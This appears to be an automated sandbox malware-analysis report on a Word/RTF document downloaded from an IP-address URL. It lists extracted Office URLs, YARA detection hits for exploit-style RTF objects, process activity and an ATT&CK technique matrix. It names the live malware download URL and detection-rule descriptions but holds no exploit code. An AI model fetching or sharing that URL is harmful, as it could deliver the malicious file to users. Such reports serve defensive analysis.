Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://powerlift.acompli.net
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://pushchannel.1drv.ms
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://res.cdn.office.net/polymer/models
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://settings.outlook.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://shell.suite.office.com:1443
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://staging.cortana.ai
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://store.office.de/addinstemplate
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://tasks.office.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://webshell.suite.office.com
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://wus2.contentsync.
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://wus2.pagecontentsync.
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://www.odwebp.svc.ms
Source: CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drString found in binary or memory: https://www.yammer.com
Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

System Summary

barindex
Source: dropped/chromecache_108, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\Downloads\4e186edb-433c-401c-ba00-d3d21353fa91.tmp, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: dropped/chromecache_108, type: DROPPEDMatched rule: SUSP_INDICATOR_RTF_MalVer_Objects date = 2022-10-20, hash2 = a31da6c6a8a340901f764586a28bd5f11f6d2a60a38bf60acd844c906a0d44b1, author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents., score = 43812ca7f583e40b3e3e92ae90a7e935c87108fa863702aa9623c6b7dc3697a2, reference = https://github.com/ditekshen/detection
Source: dropped/chromecache_108, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\Downloads\4e186edb-433c-401c-ba00-d3d21353fa91.tmp, type: DROPPEDMatched rule: SUSP_INDICATOR_RTF_MalVer_Objects date = 2022-10-20, hash2 = a31da6c6a8a340901f764586a28bd5f11f6d2a60a38bf60acd844c906a0d44b1, author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents., score = 43812ca7f583e40b3e3e92ae90a7e935c87108fa863702aa9623c6b7dc3697a2, reference = https://github.com/ditekshen/detection
Source: C:\Users\user\Downloads\4e186edb-433c-401c-ba00-d3d21353fa91.tmp, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{7A014329-3164-4767-8FED-D32E304D11AC} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: classification engineClassification label: mal56.win@26/13@4/6
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1940 --field-trial-handle=1644,i,5898683217458233683,13373722680240727198,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "http://192.3.176.146/ic/icicicicicicicicicicicicicic%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23icicicicicicicic.doc
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "C:\Users\user\Downloads\icicicicicicicicicicicicicic########################icicicicicicicic.doc" /o "
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1940 --field-trial-handle=1644,i,5898683217458233683,13373722680240727198,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "C:\Users\user\Downloads\icicicicicicicicicicicicicic########################icicicicicicicic.doc" /o "Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: icicicicicicicicicicicicicic.LNK.3.drLNK file: ..\..\..\..\..\Downloads\icicicicicicicicicicicicicic########################icicicicicicicic.doc
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdaterJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\4e186edb-433c-401c-ba00-d3d21353fa91.tmpJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationPath Interception1
Process Injection
3
Masquerading
OS Credential Dumping1
File and Directory Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS Memory2
System Information Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
Non-Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer1
Ingress Tool Transfer
SIM Card SwapCarrier Billing Fraud
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://192.3.176.146/ic/icicicicicicicicicicicicicic%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23icicicicicicicic.doc2%VirustotalBrowse
http://192.3.176.146/ic/icicicicicicicicicicicicicic%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23icicicicicicicic.doc0%Avira URL Cloudsafe
SourceDetectionScannerLabelLink
C:\Users\user\Downloads\4e186edb-433c-401c-ba00-d3d21353fa91.tmp100%AviraHEUR/Rtf.Malformed
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
https://api.scheduler.0%URL Reputationsafe
https://my.microsoftpersonalcontent.com0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://api.aadrm.com0%URL Reputationsafe
https://api.aadrm.com0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://d.docs.live.net0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://make.powerautomate.com0%URL Reputationsafe
https://make.powerautomate.com0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
https://login.windows.local0%URL Reputationsafe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
https://api.officescripts.microsoftusercontent.com/api0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
t-9999.fdv2-t-msedge.net
13.107.237.254
truefalse
    unknown
    accounts.google.com
    142.250.203.109
    truefalse
      high
      k-9999.k-msedge.net
      13.107.18.254
      truefalse
        unknown
        www.google.com
        142.250.203.100
        truefalse
          high
          clients.l.google.com
          142.250.203.110
          truefalse
            high
            clients2.google.com
            unknown
            unknownfalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1false
                high
                http://192.3.176.146/ic/icicicicicicicicicicicicicic%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23icicicicicicicic.docfalse
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://api.diagnosticssdf.office.comCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                    high
                    https://login.microsoftonline.com/CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                      high
                      https://shell.suite.office.com:1443CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                        high
                        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                          high
                          https://autodiscover-s.outlook.com/CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                            high
                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                              high
                              https://cdn.entity.CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                              • URL Reputation: safe
                              unknown
                              https://api.addins.omex.office.net/appinfo/queryCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                high
                                https://clients.config.office.net/user/v1.0/tenantassociationkeyCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                  high
                                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                    high
                                    https://powerlift.acompli.netCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://rpsticket.partnerservices.getmicrosoftkey.comCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://lookup.onenote.com/lookup/geolocation/v1CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                      high
                                      https://cortana.aiCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                        high
                                        https://cloudfiles.onenote.com/upload.aspxCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                          high
                                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                            high
                                            https://entitlement.diagnosticssdf.office.comCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                              high
                                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                high
                                                https://api.aadrm.com/CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://ofcrecsvcapi-int.azurewebsites.net/CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://www.yammer.comCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                  high
                                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                    high
                                                    https://api.microsoftstream.com/api/CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                      high
                                                      https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                        high
                                                        https://cr.office.comCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                          high
                                                          https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;hCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                          • Avira URL Cloud: safe
                                                          low
                                                          https://portal.office.com/account/?ref=ClientMeControlCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                            high
                                                            https://graph.ppe.windows.netCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                              high
                                                              https://res.getmicrosoftkey.com/api/redemptioneventsCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://powerlift-frontdesk.acompli.netCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://tasks.office.comCE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                high
                                                                https://officeci.azurewebsites.net/api/CE0FBE99-A23C-44EF-A583-A0917A6F358D.3.drfalse
                                                                • URL Reputation: safe
                                                                unknown
